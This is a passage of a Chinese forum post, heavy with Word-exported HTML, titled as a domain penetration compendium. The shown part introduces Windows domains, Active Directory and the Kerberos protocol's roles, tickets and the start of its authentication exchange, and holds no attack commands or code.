admin 发表于 2022-3-31 02:08:22

域渗透技能大全

<div style="page:WordSection1;">
        <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                <br />
        </p>
        <div style="page:WordSection1;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:Times New Roman,serif;font-size:9.5pt;">&nbsp;</span>
                </p>
                <h1 align="center" style="margin-bottom:.0001pt;margin-left:179.75pt;margin-right:184.75pt;margin-top:0cm;punctuation-wrap:simple;text-align:center;">
                        <a name="域渗透"></a>域渗透<span lang="EN-US"></span>
                </h1>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:14.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:33.0pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <a name="1、域的简单介绍"></a><b><span lang="EN-US" style="font-size:22.0pt;">1</span></b><b><span style="font-size:22.0pt;">、域的简单介绍<span lang="EN-US"></span></span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.55pt;margin-top:18.8pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span style="letter-spacing:-.35pt;">将网络中多台计算机逻辑上组织到一起进行集中管理,这种区别于工作组的逻辑环境叫</span><span style="letter-spacing:-.4pt;">做域。域是由域控制器</span>(<span lang="EN-US">Domain <span style="letter-spacing:-.15pt;">Controller</span></span><span style="letter-spacing:-.15pt;">)</span><span style="letter-spacing:-.25pt;">和成员计算机组成,域控制器就是安装了活动</span><span style="letter-spacing:-.5pt;">目录</span>(<span lang="EN-US">Active <span style="letter-spacing:-.15pt;">Directory</span></span><span style="letter-spacing:-.15pt;">)</span><span style="letter-spacing:-.25pt;">的计算机。活动目录提供了存储网络上对象信息并使用网络使用该</span><span style="letter-spacing:-.2pt;">数据的方法。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.45pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <h3 style="punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="1.1 工作组的缺点"></a><span lang="EN-US"><span>1.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>工作组的缺点<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:45.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:45.65pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">没有统一的管理机制,<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:45.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:45.65pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">没有对用户账户的统一的身份验证机制<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:45.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:45.65pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">没有统一查找网络资源的机制<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <h3 style="margin-top:.05pt;punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="1.2 域优势"></a><span lang="EN-US"><span>1.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>域优势<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;">&nbsp;</span>
                </p>
                <h6 style="margin-bottom:.0001pt;margin-left:27.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;">
                        活动目录的特点:<span lang="EN-US"></span>
                </h6>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">集中管理,可以集中的管理企业中成千上万分布于异地的计算机和用户。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">便捷的网络资源访问,能够容易的定位到域中的资源。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">用户一次登录就可访问整个网络资源,集中的身份验证。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>2<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">网络资源主要包含用户帐户、组、共享文件夹、打印机等<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.8pt;"><span>2<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span style="font-size:10.5pt;letter-spacing:-.8pt;">可扩展性,既可以适用于几十台计算机的小规模网络,也可以适用于跨国公司。<span lang="EN-US"></span></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;letter-spacing:-.8pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection2;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="554" height="340" src="https://www.2k8.org/content/uploadfile/202203/17/d3b6aea7.jpg" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:6.0pt;">&nbsp;</span>
                </p>
                <h1 style="punctuation-wrap:simple;">
                        <a name="2、Kerberos协议简介"></a><span lang="EN-US">2</span>、<span lang="EN-US">Kerberos </span>协议简介<span lang="EN-US"></span>
                </h1>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:5.25pt;margin-top:18.8pt;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">Kerberos<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">是一种网络认证协议,其设计目标是通过密钥系统为客户机</span><span lang="EN-US">/</span><span style="letter-spacing:-.15pt;">服务器应用程序</span><span style="letter-spacing:-.5pt;">提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址</span><span style="letter-spacing:-.9pt;">的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、</span><span style="letter-spacing:-.5pt;">修改和插入数据。在以上情况下,</span><span lang="EN-US" style="letter-spacing:-.25pt;">Kerberos </span><span style="letter-spacing:-.25pt;">作为一种可信任的第三方认证服务,是通过传统</span><span style="letter-spacing:-.2pt;">的密码技术</span>(<span style="letter-spacing:-.15pt;">如:共享密钥</span>)<span style="letter-spacing:-.15pt;">执行认证服务的。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.2pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h3 style="margin-left:30.45pt;punctuation-wrap:simple;tab-stops:30.5pt;text-indent:-24.5pt;">
                        <a name="2.1 Kerberos协议框架"></a><span lang="EN-US"><span>2.1<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">Kerberos<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">协议框架<span lang="EN-US"></span></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Kerberos </span>协议中主要有三个角色:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:27.0pt;margin-right:305.65pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、访问服务的<span lang="EN-US">Client 2</span>、提供服务的<span lang="EN-US"> Server</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.5pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">3</span>、<span lang="EN-US">KDC(Key Distribution Center)</span>密钥分发中心<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.55pt;margin-top:.05pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span lang="EN-US">KDC </span>默认安装在域控中,而<span lang="EN-US"> Client </span>和<span lang="EN-US"> Server </span>为域内的用户或者服务,如<span lang="EN-US">web </span>应用、数据库服务器和邮件服务器等。<span lang="EN-US">Client </span>是否有权限访问<span lang="EN-US"> Server </span>端的服务由<span lang="EN-US"> KDC </span>发放的票据来决定。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span style="letter-spacing:-.1pt;">如果把 </span><span lang="EN-US">Kerberos<span style="letter-spacing:-.45pt;"> </span></span><span style="letter-spacing:-.45pt;">中的票据比作一张火车票,那么 </span><span lang="EN-US">Client<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">端就是乘客,</span><span lang="EN-US" style="letter-spacing:-.55pt;">Server</span><span lang="EN-US" style="letter-spacing:-.15pt;"> </span><span style="letter-spacing:-.15pt;">就是火车, </span><span style="letter-spacing:.3pt;">而 </span><span lang="EN-US">KDC<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">就是火车站的认证系统。如果 </span><span lang="EN-US">Client<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">端的票据是合法的</span>(<span style="letter-spacing:-.15pt;">由你本人身份证购买并且由你本人持有</span><span style="letter-spacing:-1.8pt;">)</span><span style="letter-spacing:-.05pt;">同时有访问 </span><span lang="EN-US">Server<span style="letter-spacing:-.3pt;"> </span></span><span style="letter-spacing:-.3pt;">端服务的权限</span><span style="letter-spacing:-.15pt;">(车票对应车次正确</span><span style="letter-spacing:-1.8pt;">)</span><span style="letter-spacing:-.35pt;">那么你才能上车。当</span><span style="letter-spacing:-.25pt;">然和火车票不同的是 </span><span lang="EN-US" style="color:red;">Kerberos<span style="letter-spacing:-.15pt;"> </span></span><span style="color:red;letter-spacing:-.15pt;">中有两张票据</span><span style="color:black;letter-spacing:-.15pt;">,而火车票只有一张。<span lang="EN-US"></span></span>
                </p>
        </div>
<span lang="EN-US" style="color:black;font-family:等线;font-size:10.5pt;letter-spacing:-.15pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection3;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:4.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:11.55pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="536" height="292" src="https://www.2k8.org/content/uploadfile/202203/17/956d1fb0.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:8.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.65pt;punctuation-wrap:simple;text-autospace:none;">
                        由上图可以看出,<span lang="EN-US">KDC </span>又分为两个部分<span lang="EN-US">:</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.8pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <b><span lang="EN-US" style="letter-spacing:-.05pt;">Auth</span><span lang="EN-US">e<span style="letter-spacing:-.05pt;">n</span><span style="letter-spacing:-.1pt;">t</span><span style="letter-spacing:-.05pt;">ic</span>at<span style="letter-spacing:-.15pt;">i</span>on <span style="letter-spacing:-.15pt;">S</span>e<span style="letter-spacing:-.1pt;">rv</span>er: </span></b><span lang="EN-US" style="letter-spacing:-.15pt;">A</span><span lang="EN-US">S </span><span style="letter-spacing:.2pt;">的作用就是验证</span><span lang="EN-US" style="letter-spacing:-.1pt;">C</span><span lang="EN-US">l<span style="letter-spacing:.05pt;">i</span>e<span style="letter-spacing:-.1pt;">n</span>t </span><span style="letter-spacing:-1.85pt;">的身份</span><span style="letter-spacing:-.15pt;">(确认你是身份证上的本人</span><span style="letter-spacing:-5.4pt;">)</span>,<span style="letter-spacing:.15pt;">验证通过就给一张</span><span lang="EN-US">TGT(Ticket Granting Ticket<span style="letter-spacing:-.15pt;">)</span></span><span style="letter-spacing:-.15pt;">票给 </span><span lang="EN-US">Client</span>。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.5pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">T<span style="letter-spacing:-.05pt;">ic</span>k<span style="letter-spacing:-.15pt;">e</span>t<span style="letter-spacing:-.75pt;"> </span><span style="letter-spacing:-.05pt;">G</span><span style="letter-spacing:-.1pt;">r</span>anti<span style="letter-spacing:-.05pt;">n</span>g<span style="letter-spacing:-.85pt;"> </span><span style="letter-spacing:-.05pt;">S</span><span style="letter-spacing:-.1pt;">e</span>r<span style="letter-spacing:-.1pt;">v</span>er<span style="letter-spacing:-.1pt;">:</span></span></b><span lang="EN-US" style="letter-spacing:-.1pt;">TG</span><span lang="EN-US">S<span style="letter-spacing:-.3pt;"> </span></span><span style="letter-spacing:-.15pt;">的作用就是通过</span><span style="letter-spacing:-.25pt;"> </span><span lang="EN-US">AS<span style="letter-spacing:-.4pt;"> </span></span><span style="letter-spacing:1.25pt;">发给</span><span lang="EN-US">C<span style="letter-spacing:-.1pt;">l</span>ie<span style="letter-spacing:-.1pt;">n</span>t<span style="letter-spacing:-.25pt;"> </span></span><span style="letter-spacing:-2.3pt;">的票</span><span style="letter-spacing:-.15pt;">(</span><span lang="EN-US" style="letter-spacing:-.1pt;">T</span><span lang="EN-US">G<span style="letter-spacing:-.1pt;">T</span></span><span style="letter-spacing:-4.45pt;">)</span><span style="letter-spacing:-.15pt;">换取访问</span><span style="letter-spacing:-.25pt;"> </span><span lang="EN-US" style="letter-spacing:-.05pt;">Se</span><span lang="EN-US">rv<span style="letter-spacing:-.15pt;">e</span>r</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:93.35pt;margin-top:21.85pt;width:403pt;height:309pt;z-index:251658240;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:309.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1058" type="#_x0000_t75" style="width:403.5pt;height:309.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image005.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="187" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="540" height="415" src="https://www.2k8.org/content/uploadfile/202203/17/20cff092.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span style="letter-spacing:-.1pt;">端的票</span><span style="letter-spacing:-.25pt;"> </span><span lang="EN-US" style="letter-spacing:-.05pt;">S</span><span lang="EN-US" style="letter-spacing:-.1pt;">T</span>(<span lang="EN-US" style="letter-spacing:-.05pt;">S</span><span lang="EN-US" style="letter-spacing:-.1pt;">e</span><span lang="EN-US">r<span style="letter-spacing:-.15pt;">v</span>er<span style="letter-spacing:-.15pt;"> </span><span style="letter-spacing:.05pt;">T</span>i<span style="letter-spacing:.05pt;">c</span><span style="letter-spacing:-.05pt;">k</span>e<span style="letter-spacing:-.15pt;">t</span></span><span style="letter-spacing:-5.4pt;">)</span>。<span lang="EN-US" style="letter-spacing:-.05pt;">S</span><span lang="EN-US">T<span style="letter-spacing:-.35pt;"> </span></span><span style="letter-spacing:-.15pt;">也有资料称之为</span><span style="letter-spacing:-.4pt;"> </span><span lang="EN-US" style="letter-spacing:.05pt;">T</span><span lang="EN-US">GS<span style="letter-spacing:-.15pt;"> </span><span style="letter-spacing:.05pt;">T</span><span style="letter-spacing:-.1pt;">i</span>ck<span style="letter-spacing:-.05pt;">et</span></span>。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection4;">
                <h3 style="margin-bottom:.0001pt;margin-left:30.45pt;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;tab-stops:30.5pt;text-indent:-24.5pt;">
                        <a name="2.2 Kerberos认证流程"></a><span lang="EN-US"><span>2.2<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">Kerberos<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">认证流程<span lang="EN-US"></span></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        当<span lang="EN-US"> Client </span>想要访问<span lang="EN-US"> Server </span>上的某个服务时,需要先向<span lang="EN-US"> AS </span>证明自己的身份,然后通过<span lang="EN-US"> AS</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        发放的<span lang="EN-US"> TGT </span>向<span lang="EN-US"> Server </span>发起认证请求,这个过程分为三块:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">The Authentication Service Exchange: </span></b><span lang="EN-US">Client </span>与<span lang="EN-US"> AS </span>的交互<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">The Ticket Granting Service Exchange:</span></b><span lang="EN-US">Client </span>与<span lang="EN-US"> TGS </span>的交互<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">The Client/Server Authentication Exchange:</span></b><span lang="EN-US">Client </span>与<span lang="EN-US"> Server </span>的交互<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1027" style="position:absolute;margin-left:92.7pt;margin-top:20.55pt;width:410pt;height:256pt;z-index:251659264;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:256.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1059" type="#_x0000_t75" style="width:410.5pt;height:256pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image007.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="185" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="549" height="344" src="https://www.2k8.org/content/uploadfile/202203/17/67760df9.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:12.0pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:16.0pt;">&nbsp;</span>
                </p>
                <h5 style="margin-left:24.0pt;punctuation-wrap:simple;tab-stops:24.05pt;">
                        <span lang="EN-US" style="letter-spacing:-.1pt;"><span>(1)<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US">The Authentication Service<span style="letter-spacing:-.05pt;"> </span>Exchange</span>
                </h5>
                <h6 style="punctuation-wrap:simple;">
                        <span lang="EN-US">KRB_AS_REQ:</span>
                </h6>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Client-&gt;AS:</span>发送<span lang="EN-US"> Authenticator1(Client </span>密码加密<span lang="EN-US"> TimeStamp)</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        第一步<span lang="EN-US"> Client </span>先向<span lang="EN-US"> KDC </span>的<span lang="EN-US"> AS </span>发送<span lang="EN-US"> Authenticator1,</span>内容为通过<span lang="EN-US"> Client </span>密码<span lang="EN-US"> hash </span>加密的时间戳、<span lang="EN-US">Client ID</span>、网络地址、加密类型等内容。<span lang="EN-US"></span>
                </p>
                <h6 style="line-height:15.5pt;margin-top:0cm;punctuation-wrap:simple;">
                        <span lang="EN-US">KBR_AS_REP:</span>
                </h6>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">AS-&gt;Client:</span>发送<span lang="EN-US"> Client </span>密码加密的<span lang="EN-US"> sessionkey-as </span>和票据<span lang="EN-US"> TGT</span>(<span lang="EN-US">KBRTGT HASH </span>加密的<span lang="EN-US"></span>
                </p>
